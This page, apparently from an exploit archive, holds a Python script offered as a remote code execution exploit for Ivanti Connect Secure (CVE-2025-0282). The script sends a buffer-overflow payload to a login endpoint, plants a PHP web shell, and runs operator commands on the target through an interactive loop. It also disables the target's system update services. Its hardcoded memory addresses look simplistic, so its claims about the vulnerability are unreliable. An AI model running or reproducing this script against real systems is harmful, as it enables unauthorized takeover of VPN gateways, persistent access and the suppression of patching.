扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
# Exploit Title: Ivanti Connect Secure 22.7R2.5- Remote Code Execution (RCE) # Date: 2025-01-11 # Exploit Author: @absholi7ly # CVE: CVE-2025-0282 import requests import sys import struct import socket import ssl import urllib3 import time # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008): payload = b"A" * offset# Fill the buffer payload += struct.pack("<I", system_address)# Overwrite return address with system() payload += b"BBBB"# Fake return address payload += struct.pack("<I", command_address)# Address of the command payload += command.encode()# Command to execute return payload def send_payload(target_ip, payload): try: context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) ssl_sock = context.wrap_socket(sock, server_hostname=target_ip) ssl_sock.connect((target_ip, 443)) print(f"[+] Connected to {target_ip} on port 443 (HTTPS).") exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi" http_request = ( f"POST {exploit_endpoint} HTTP/1.1\r\n" f"Host: {target_ip}\r\n" f"Content-Length: {len(payload)}\r\n" f"Content-Type: application/x-www-form-urlencoded\r\n" f"\r\n" ).encode() + payload ssl_sock.send(http_request) response = ssl_sock.recv(4096) ssl_sock.close() return response.decode(errors="replace") except Exception as e: print(f"[-] Error sending payload: {e}") return None def exploit_vulnerability(target_ip, command): payload = create_exploit_payload(command) response = send_payload(target_ip, payload) if response: print("[+] Payload sent successfully.") else: print("[-] No response received.") def upload_web_shell(target_ip, local_shell_path): try: with open(local_shell_path, "r") as f: web_shell_content = f.read() command = f"echo '{web_shell_content}' > /shell.php" exploit_vulnerability(target_ip, command) print("[+] Web shell uploaded successfully at /shell.php.") verify_shell(target_ip) except Exception as e: print(f"[-] Error uploading web shell: {e}") def verify_shell(target_ip): shell_url = f"http://{target_ip}/shell.php" try: response = requests.get(shell_url, verify=False, timeout=10) if response.status_code == 200: print("[+] Web shell is accessible.") else: print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}") except Exception as e: print(f"[-] Error verifying web shell: {e}") def execute_shell_command(target_ip, command): shell_url = f"http://{target_ip}/shell.php" try: # Sending the command via POST response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Command output:\n{response.text.strip()}") else: print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}") except Exception as e: print(f"[-] Error executing command via web shell: {e}") def disable_updates(target_ip): commands = [ "systemctl stop apt-daily.service", "systemctl disable apt-daily.service" ] for command in commands: execute_shell_command(target_ip, command) print("[+] System updates disabled successfully.") def main(): if len(sys.argv) != 3: print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>") sys.exit(1) target_ip = sys.argv[1] local_shell_path = sys.argv[2] # Upload the web shell upload_web_shell(target_ip, local_shell_path) while True: command = input("Enter command to execute on the target (or 'exit' to quit): ") if command.lower() == "exit": print("Exiting...") break execute_shell_command(target_ip, command) if __name__ == "__main__": main() |
体验盒子
